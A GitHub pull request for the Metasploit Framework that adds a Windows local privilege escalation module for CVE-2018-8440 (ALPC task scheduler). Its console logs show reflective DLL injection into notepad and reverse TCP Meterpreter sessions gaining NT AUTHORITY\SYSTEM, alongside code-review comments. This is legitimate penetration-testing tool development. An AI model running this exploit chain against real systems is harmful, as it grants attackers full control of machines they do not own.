New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Windows 8+ Local Privilege Escalation via ALPC Scheduler (CVE-2018-8440) #10643

Merged
merged 15 commits into from Sep 21, 2018

Conversation

@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Sep 14, 2018

WIP Completed

Please do not land... this does not work, yet now

Historical

We managed to get the PoC playing nice, and I have code execution through the reflectivedll loader, but when I try and launch the function that contains the exploit, the reflective loader fails. I have no idea why right now.

You can test it and see.... I have a test function that pops a messagebox. That function is located in the same location as the exploit function. I can call the test function fine, but Reflective Loading fails when I add a call to the exploit function.

As it is currently, you can run this module:

msf5 exploit(windows/local/alpc_taskscheduler) > show options

Module options (exploit/windows/local/alpc_taskscheduler):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PATH                           no        Path to write the payload (%TEMP% by default).
   PAYLOAD_NAME                   no        The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).
   SESSION       1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.111  yes       The listen address (an interface may be specified)
   LPORT     5464             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64


msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 1780 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\CBEaaBtrE.dll...
[*] payload path length = 49...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 1780...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > 

On the target machine, we get the messagebox:
image

If I uncomment the call to the exploit function in the test function, Reflective Injection fails with this:

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 192.168.135.111:5464 
[*] Checking target...
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Payload (5120 bytes) uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 2360 launched.
[*] Attempting to change the payload path to C:\Users\msfuser\AppData\Local\Temp\QwgpTmXoCj.dll...
[*] payload path length = 50...
[*] original path length = 84...
[*] Reflectively injecting the exploit DLL into 2360...
[-] Exploit failed: Rex::PeParsey::PeParseyError Cannot find rva! 1735288172
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > 

I've been looking at it too long, so if anyone (cough @OJ @bcook @jrobles-r7 @asoto-r7) can see what I'm screwing up, please tell me.

asoto-r7 and others added some commits Sep 13, 2018

@OJ

This comment has been minimized.

Copy link
Contributor

OJ commented Sep 14, 2018

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Sep 17, 2018

I was able to get this working locally with Reflective DLL Injection. I have a few hardcoded paths in the module and one in the solution for testing that I need to fix, along with some other things. I'll have the changes up sometime today or tomorrow.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Sep 17, 2018

msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-IPOGIJR\msfdev @ DESKTOP-IPOGIJR  172.22.222.243:4444 -> 172.22.222.200:50490 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.243:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Payload (5120 bytes) uploaded on DESKTOP-IPOGIJR to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll
[*] Target Looks Good... trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 3768 launched.
[*] Attempting to change the payload path to C:\Users\msfdev\AppData\Local\Temp\lbNjsaazXMT.dll...
[*] Reflectively injecting the exploit DLL into 3768...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.243:4444 -> 172.22.222.200:50491) at 2018-09-17 17:37:07 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
@OJ

This comment has been minimized.

Copy link
Contributor

OJ commented Sep 17, 2018

Looking good! Nice work folks. I'm going to give this a once-over so brace yourself for a bunch of comments that you probably already know about :)

@OJ
Copy link
Contributor

OJ left a comment

I think this is looking good. We could probably do away with the instance-level variables in the module as well, as I've been bitten by mixin issues with variable name clashes in the past. That's just personal preference.

Thanks again for the work so far!

Show resolved Hide resolved ...rce/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp Outdated
Show resolved Hide resolved ...rce/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp Outdated
CloseHandle(hPayload);

//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
CoInitialize(nullptr);

This comment has been minimized.

@OJ

OJ Sep 17, 2018

Contributor

We may need to consider the result of this call. I've had issues in the past depending on the process that we're injecting into.

Show resolved Hide resolved modules/exploits/windows/local/alpc_taskscheduler.rb Outdated
Show resolved Hide resolved modules/exploits/windows/local/alpc_taskscheduler.rb Outdated
Show resolved Hide resolved modules/exploits/windows/local/alpc_taskscheduler.rb Outdated
end
end

def validate_target

This comment has been minimized.

@OJ

OJ Sep 17, 2018

Contributor

Should this instead be the check method that makes sure the target OS/version/arch is supported?

This comment has been minimized.

@jrobles-r7

jrobles-r7 Sep 18, 2018

Contributor

A check method can be added.

This comment has been minimized.

@jrobles-r7

jrobles-r7 Sep 21, 2018

Contributor

jrobles-r7@39128df
I was going to try checking for installed hotfix ids but there are a lot and I'm not sure how to pull the info I need from meterpreter, specifically Win10 releases/version? (1607, 1703, 1709, 1803). Some of the hotfix ids also depend on Security Updates vs Monthly Rollout.
I linked to a check example for this module in my repo. Any suggestions?
@OJ @bcoles

jrobles-r7 added some commits Sep 19, 2018

@jrobles-r7 jrobles-r7 changed the title WIP: CVE 2018 8440 ALPC Scheduler [WIP] CVE-2018-8440 ALPC Scheduler Sep 19, 2018

jrobles-r7 added some commits Sep 19, 2018

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Sep 20, 2018

msf5 exploit(windows/local/alpc_taskscheduler) > run

[*] Started reverse TCP handler on 172.22.222.253:4444 
[*] Checking target...
[*] Attempting to PrivEsc on DESKTOP-IPOGIJR via session ID: 1
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 10200 launched.
[*] Writing payload dll into process 10200 memory
[*] Reflectively injecting the exploit DLL into 10200...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.253:4444 -> 172.22.222.200:50491) at 2018-09-19 21:23:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >

jrobles-r7 added some commits Sep 20, 2018

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Sep 21, 2018

I couldn't help but notice this bug does not have a logo.

I suggest something alpaca themed. Perhaps with a timepiece.

I offer:

ALPaCa Scheduler

Source images stolen from:

jrobles-r7 added some commits Sep 21, 2018

jrobles-r7 added some commits Sep 21, 2018

specify meterpreter, update documentation
Warning is after spell...
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Sep 21, 2018

msf5 > use exploit/windows/local/alpc_taskscheduler
msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(windows/local/alpc_taskscheduler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell x64/windows        Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al...  172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
  2         meterpreter x64/windows  DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR                                       172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)

msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
session => 1
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
session => 2
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[*] Target Looks Good... trying to start notepad.exe
[*] Launching notepad.exe to host the exploit...
[+] Process 6140 launched.
[*] Writing payload dll into process 6140 memory
[*] Reflectively injecting the exploit DLL into 6140...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (206403 bytes) to 172.22.222.200
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
session => 3
msf5 exploit(windows/local/alpc_taskscheduler) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Checking target...
[-] Exploit aborted due to failure: none: Session is already elevated
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/alpc_taskscheduler) >

@bwatters-r7 bwatters-r7 removed the delayed label Sep 21, 2018

@bwatters-r7 bwatters-r7 self-assigned this Sep 21, 2018

@bwatters-r7 bwatters-r7 merged commit 47bf780 into rapid7:master Sep 21, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bwatters-r7 added a commit that referenced this pull request Sep 21, 2018

Land #10643, CVE-2018-8440 ALPC Scheduler
Merge branch 'land-10643' into upstream-master
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Sep 21, 2018

🍰

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Sep 21, 2018

Testing Results:
image

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Sep 21, 2018

Release Notes

This adds a local privilege escalation exploit for Windows 8 and later targeting the Windows ALPC scheduler.

msjenkins-r7 added a commit that referenced this pull request Sep 24, 2018

Land #10643, CVE-2018-8440 ALPC Scheduler
Merge branch 'land-10643' into upstream-master

@asoto-r7 asoto-r7 changed the title [WIP] CVE-2018-8440 ALPC Scheduler Windows 8+ Local Privilege Escalation via ALPC Scheduler (CVE-2018-8440) Dec 11, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment